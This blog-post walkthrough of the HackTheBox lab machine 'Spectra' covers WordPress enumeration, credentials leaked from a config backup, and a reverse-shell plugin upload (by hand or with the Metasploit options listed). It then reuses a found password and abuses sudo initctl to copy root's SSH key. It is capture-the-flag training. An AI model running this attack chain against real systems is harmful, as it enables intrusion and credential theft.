HackTheBox: (“Spectra”) — Walkthrough

Mohamed Elmasry
7 min readJun 26, 2021

--

Hi People :D

Today we gonna solve “Spectra” machine from HackTheBox, an easy machine that focuses on WordPress exploitation and service manipulation, let’s go :D

Info

Enumeration

— — — — — —

Start with Nmap

nmap -A 10.10.10.229

We have three open ports (22/80/3306) we can’t do anything with port 3306 so let’s navigate to the website on port 80

Web Enumeration

— — — — — — — —

On port 80, we have a basic website that contains two URLs

The first URL (The Software Issue Tracker button ) redirecting us to (“http://spectra.htb/main/”) so we need to add spectra.htb domain to the /etc/hosts file first to be able to see the website contains.

After adding it, navigate to (“http://spectra.htb/main/”), we have a Log in button and it seems interesting so let’s check out

Hmmm, we have a WordPress login form.

First, let’s try some default credentials like admin, administrator… etc.

When we try admin as a username, it says “Unknown username” which means that’s no username called admin

Let’s try administrator as a username with any password, this time it says “The password is incorrect” so we have a username called administrator but we don’t know the password

Now let’s check on the second URL that we found in the machine IP (“http://spectra.htb/testing/index.php”), it gives us an error

But it’s only the index page! so let’s fuzzing directories to see if there are any hidden directories (I used dirsearch tool)

./dirsearch.py -u http://spectra.htb/testing/ -e "*" -i 200

We have a file called wp-config.php.save, let’s see its contents

It’s a blank page, but there’s a lot of data in the source code.

In the middle of this data, there’s a username and password (devtest:devteam01)

After I saw these creds, it came to my mind immediately that it may be the credentials for the WordPress login page.

I tried devtest as a username and devteam01 as a password but it said “Unknown username”, so I used the password only and keep the username administrator.

Fortunately, it worked! I was able to log into the WordPress admin panel with these creds (administrator:devteam01)

Exploitation

— — — — — —

[*] Manual Exploitation :

According to This Article, We can manually upload a zipped reverse shell as a plugin

Cool! let’s copy this code to a file called wp-ReverseShell.php ( or any other name you want ) then change the bash reverse shell command to a Pentestmonkey PHP Reverse Shell ( because the bash one didn’t work for me ), then change the IP in the script to your HTB one and finally make a ZIP archive of this script using :

zip wp-ReverseShell.zip ./wp-ReverseShell.php

( Note: the commented block of code at the top of the script is required for it to work because this is the format of WordPress plugins )

Now our ZIP archive is ready for upload.

Start a Netcat listener first and after that, Navigate to the WordPress admin panel again and from the left menu click on Plugins > Add New > Upload Plugin > Browse, then choose your zipped archive of the script and click on Install Now.

At this point, the plugin is installed, but you have to click on Activate Plugin button to get a shell as nginx.

This GIF simplifies the uploading process :

You can improve your shell by executing these commands :

python3 -c 'import pty; pty.spawn("/bin/bash")'export TERM=linux

[*] Automated Exploitation :

We can use This Metasploit module to automatically upload a reverse shell on the WordPress admin panel and open a shell

Let’s set the module requirements first :

set PASSWORD devteam01 set RHOSTS 10.10.10.229set TARGETURI /mainset USERNAME administratorset lhost tun0exploit

After running this module with these options, you’ll get a shell as nginx

User Flag

— — — — —

After some file enumeration, I found an interesting script called autologin.conf.orig located in the /opt/ directory.

This script reads a password from another file called passwd located in /etc/autologin directory

Navigate to /etc/autologin directory, there’s the passwd file which contains a password that we’re looking for (SummerHereWeCome!!)

We need to find the correct user to use this password with him, we can display the users by navigating to /home directory and see users names by listing the directory names, or by reading /etc/passwd file

We have 2 users (Chronos & katie), the password that we found earlier (SummerHereWeCome!!) works with katie so we can SSH into katie and read the user flag from user.txt located in /home/katie directory ☺

Root Flag

— — — — —

From katie’s shell, execute sudo -l command to see if we can run any service or file as root without a password.

In this machine, we can run initctl as root without a password

initctl allows a system administrator to communicate and interact with the upstart init daemon.

init is the parent of all processes on the system, it is executed by the kernel and is responsible for starting all other processes.

These init files have *.conf extension and they’re located in /etc/init directory.

In our machine, we have a lot of these .conf files but they’re some test files so let’s see any of them

These .conf files have a slightly weird format but they seem to execute normal bash commands between script & end script tags

If we can edit this test.conf file and run it using initctl, we will be able to execute any command as root !!

So let’s try to edit this test.conf file by putting a command that copies the root private SSH key from /root/.ssh/id_rsa file to another file called id_rsa located in /home/katie/ directory (or any directory that we have access to) then gives it world-write&read permission with chmod 777 command:

cp /root/.ssh/id_rsa /home/katie/id_rsa && chmod 777 /home/katie/id_rsa

After editing the test.conf file, run sudo initctl start test command and you’ll see that the id_rsa file has been created and contains the root private SSH key which we can use to SSH into root then read the root flag from /root/root.txt

OR we can get the root flag directly by editing the file to copy the root flag from /root/root.txt file to /home/katie/flag.txt file then gives it full permission:

cp /root/root.txt /home/katie/flag.txt && chmod 777 /home/katie/flag.txt

Run sudo initctl start test, this time the flag.txt file will be created with the root flag inside ☺

Thanks for reading and I hope you love this writeup ❤.

You can give me Respect on my HackTheBox Account (if you want :D).

Facebook TwitterLinkedIn

--

--

Mohamed Elmasry

Digital Forensics Investigator | CTF player and creator | SOC Analysts | Threat Hunter